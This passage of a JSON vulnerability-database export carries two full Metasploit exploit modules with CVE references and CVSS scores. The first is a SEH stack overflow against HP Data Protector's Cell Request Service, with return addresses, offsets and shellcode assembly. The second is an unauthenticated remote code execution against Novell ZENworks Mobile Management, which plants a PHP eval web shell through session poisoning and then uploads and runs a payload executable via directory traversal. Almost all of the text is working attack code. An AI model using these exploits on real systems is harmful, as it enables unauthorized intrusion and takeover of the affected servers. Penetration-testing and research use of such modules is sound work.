6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb"}, {"lastseen": "2019-11-23T06:45:46", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-10T15:06:17", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_DATAPROTECTOR_CRS", "href": "", "type": "metasploit", "title": "HP Data Protector Cell Request Service Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Data Protector Cell Request Service Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.\n },\n 'Author' =>\n [\n 'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2333' ],\n [ 'OSVDB', '93867' ],\n [ 'BID', '60309' ],\n [ 'ZDI', '13-130' ]\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 4096,\n 'BadChars' => \"\\x00\\xff\\x20\" # \"\\x00\\x00\", \"\\xff\\xff\" and \"\\x20\\x00\" not allowed\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'HP Data Protector 6.20 build 370 / Windows XP SP3',\n {\n 'Ret' => 0x00436fe2, # ppr from crs.exe\n 'Offset' => 15578\n }\n ],\n [ 'HP Data Protector 7.00 build 72 / Windows XP SP3',\n {\n 'Ret' => 0x004cf8c1, # ppr from crs.exe\n 'Offset' => 15578\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 03 2013'))\n\n deregister_options('RPORT') # The CRS service runs on a random port\n end\n\n def build_pkt(fields)\n data = \"\\xff\\xfe\" # BOM Unicode\n fields.each do |k, v|\n if k == \"Payload\"\n data << \"#{v}\\x00\\x00\"\n else\n data << \"#{Rex::Text.to_unicode(v)}\\x00\\x00\"\n end\n data << Rex::Text.to_unicode(\" \") # Separator\n end\n\n data.chomp!(Rex::Text.to_unicode(\" \")) # Delete last separator\n data << \"\\x00\\x00\" # Ending\n return [data.length].pack(\"N\") + data\n end\n\n def get_fingerprint\n ommni = connect(false, {'RPORT' => 5555})\n ommni.put(rand_text_alpha_upper(64))\n resp = ommni.get_once(-1)\n disconnect\n\n if resp.nil?\n return nil\n end\n\n return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl\n end\n\n def get_crs_port\n\n pkt = build_pkt({\n \"Opcode\" => \"2\",\n \"FakeMachineName\" => rand_text_alpha(8),\n \"Unknown1\" => \"0\",\n \"FakeDomainUser\" => rand_text_alpha(8),\n \"FakeDomain\" => rand_text_alpha(8),\n \"FakeLanguage\" => rand_text_alpha(8),\n \"Unknown2\" => \"15\"\n })\n ommni = connect(false, {'RPORT' => 5555})\n ommni.put(pkt)\n resp = ommni.get_once(-1)\n disconnect\n\n if resp.nil?\n return nil\n end\n\n res_length, bom_unicode, res_data = resp.unpack(\"Nna*\")\n\n fields = res_data.split(Rex::Text.to_unicode(\" \"))\n\n opcode = fields[0]\n port = fields[1]\n\n if not opcode or not port\n vprint_error(\"Unexpected response\")\n return nil\n end\n\n opcode = Rex::Text.to_ascii(opcode.chomp(\"\\x00\\x00\"))\n\n if opcode != \"109\"\n vprint_error(\"Unexpected opcode #{opcode} in the response\")\n return nil\n end\n\n port = Rex::Text.to_ascii(port.chomp(\"\\x00\\x00\"))\n return port.to_i\n end\n\n def check\n fingerprint = get_fingerprint\n\n if fingerprint.nil?\n vprint_error(\"Unable to fingerprint\")\n return Exploit::CheckCode::Unknown\n end\n\n port = get_crs_port\n\n if port.nil?\n vprint_status(\"HP Data Protector version #{fingerprint}\")\n vprint_error(\"But CRS port not found\")\n else\n vprint_status(\"CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}\")\n end\n\n if fingerprint =~ /HP Data Protector A\\.06\\.20: INET, internal build 370/\n # More likely to be exploitable\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.07\\.00: INET, internal build 72/\n # More likely to be exploitable\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.07\\.00/\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.07\\.01/\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.06\\.20/\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.06\\.21/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def get_target\n fingerprint = get_fingerprint\n\n if fingerprint.nil?\n return nil\n end\n\n if fingerprint =~ /HP Data Protector A\\.06\\.20: INET, internal build 370/\n return targets[1]\n elsif fingerprint =~ /HP Data Protector A\\.07\\.00: INET, internal build 72/\n return targets[2]\n else\n return nil\n end\n end\n\n def exploit\n\n if target.name =~ /Automatic/\n print_status(\"Trying to find the target version...\")\n my_target = get_target\n else\n my_target = target\n end\n\n if my_target.nil?\n fail_with(Failure::NoTarget, \"Failed to autodetect target\")\n end\n\n print_status(\"Trying to find the CRS service port...\")\n port = get_crs_port\n if port.nil?\n fail_with(Failure::NotFound, \"The CRS service has not been found.\")\n else\n print_good(\"CRS service found on #{port}/TCP\")\n connect(true, {'RPORT' => port})\n end\n\n pkt = build_pkt({\n \"Opcode\" => \"0\",\n \"EndPoint\" => \"GUICORE\",\n \"ClientFingerprint\" => \"HP OpenView OmniBack II A.06.20\",\n \"FakeUsername\" => rand_text_alpha(8),\n \"FakeDomain\" => rand_text_alpha(8),\n \"Unknown1\" => \"488\",\n \"Unknown2\" => rand_text_alpha(8)\n })\n print_status(\"Sending packet with opcode 0...\")\n sock.put(pkt)\n data = sock.get_once(-1)\n\n if data.nil?\n fail_with(Failure::Unknown, \"Error while communicating with the CRS Service\")\n end\n\n if Rex::Text.to_ascii(data) !~ /NT-5\\.1/\n fail_with(Failure::NoTarget, \"Exploit only compatible with Windows XP targets\")\n end\n\n pkt = build_pkt({\n \"Opcode\" => \"225\"\n })\n print_status(\"Sending packet with opcode 225...\")\n sock.put(pkt)\n data = sock.get_once(-1)\n\n if data.nil?\n fail_with(Failure::Unknown, \"Error while communicating with the CRS Service\")\n end\n\n bof = payload.encoded\n bof << rand_text(my_target[\"Offset\"] - payload.encoded.length)\n bof << generate_seh_record(my_target.ret)\n bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-#{my_target['Offset']+8}\").encode_string\n bof << rand_text(100) # Trigger Exception\n\n pkt = build_pkt({\n \"Opcode\" => \"211\",\n \"Payload\" => bof\n })\n print_status(\"Sending malicious packet with opcode 211...\")\n sock.put(pkt)\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_dataprotector_crs.rb"}, {"lastseen": "2019-11-07T11:58:43", "bulletinFamily": "exploit", "description": "This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation, remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language' parameter of a POST call to DUSAP.php.\n", "modified": "2017-07-24T13:26:21", "published": "2013-06-04T16:20:10", "id": "MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MDM_LFI", "href": "", "type": "metasploit", "title": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize\n super(\n 'Name' => 'Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability',\n 'Description' => %q{\n This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.\n },\n 'Author' =>\n [\n 'steponequit', # Metasploit module\n 'Andrea Micalizzi (aka rgod)' #zdi report\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Novell Zenworks Mobile Device Management on Windows', {} ],\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n ['CVE', '2013-1081'],\n ['OSVDB', '91119'],\n ['ZDI', '13-087'],\n ['URL', 'http://www.novell.com/support/kb/doc.php?id=7011895']\n ],\n 'DisclosureDate' => \"Mar 13 2013\",\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path to the Novell Zenworks MDM install', '/']),\n OptInt.new('RPORT', [true, \"Default remote port\", 80])\n ])\n\n register_advanced_options([\n OptBool.new('SSL', [true, \"Negotiate SSL connection\", false])\n ])\n end\n\n def get_version\n version = nil\n\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => target_uri.path\n })\n\n if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)\n version = res.body.to_s.match(/<p id=\"version\">Version (.*)<\\/p>/)[1]\n end\n\n return version\n end\n\n def check\n v = get_version\n print_status(\"Detected version: #{v || 'Unknown'}\")\n\n if v.nil?\n return Exploit::CheckCode::Unknown\n elsif v =~ /^2\\.6\\.[01]/ or v =~ /^2\\.7\\.0/\n # Conditions based on OSVDB info\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def setup_session()\n sess = Rex::Text.rand_text_alpha(8)\n cmd = Rex::Text.rand_text_alpha(8)\n res = send_request_cgi({\n 'agent' => \"<?php echo(eval($_GET['#{cmd}'])); ?>\",\n 'method' => \"HEAD\",\n 'uri' => normalize_uri(\"#{target_uri.path}/download.php\"),\n 'headers' => {\"Cookie\" => \"PHPSESSID=#{sess}\"},\n })\n return sess,cmd\n end\n\n def upload_shell(session_id,cmd_var)\n fname = Rex::Text.rand_text_alpha(8)\n payload = generate_payload_exe\n cmd = \"$wdir=getcwd().'\\\\\\\\..\\\\\\\\..\\\\\\\\php\\\\\\\\temp\\\\\\\\';\"\n cmd << \"file_put_contents($wdir.'#{fname}.exe',\"\n cmd << \"base64_decode(file_get_contents('php://input')));\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"DUSAP.php\"),\n 'data' => Rex::Text.encode_base64(payload),\n 'vars_get' => {\n 'language' => \"res/languages/../../../../php/temp/sess_#{session_id}\",\n cmd_var => cmd\n }\n })\n return fname\n end\n\n def exec_shell(session_id,cmd_var,fname)\n cmd = \"$wdir=getcwd().'\\\\\\\\..\\\\\\\\..\\\\\\\\php\\\\\\\\temp\\\\\\\\';\"\n cmd << \"$cmd=$wdir.'#{fname}';\"\n cmd << \"$output=array();\"\n cmd << \"$handle=proc_open($cmd,array(1=>array('pipe','w')),\"\n cmd << \"$pipes,null,null,array('bypass_shell'=>true));\"\n cmd << \"if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"DUSAP.php\"),\n 'data' => Rex::Text.encode_base64(payload),\n 'vars_get' => {\n 'language' => \"res/languages/../../../../php/temp/sess_#{session_id}\",\n cmd_var => cmd\n }\n })\n end\n\n\n def exploit()\n begin\n print_status(\"Checking application version...\")\n v = get_version\n if v.nil?\n print_error(\"Unable to detect version, abort!\")\n return\n end\n\n print_good(\"Found Version #{v}\")\n print_status(\"Setting up poisoned session\")\n session_id,cmd = setup_session()\n print_status(\"Uploading payload\")\n fname = upload_shell(session_id,cmd)\n print_status(\"Executing payload\")\n exec_shell(session_id,cmd,fname)\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n rescue ::OpenSSL::SSL::SSLError => e\n return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/novell_mdm_lfi.rb"}]}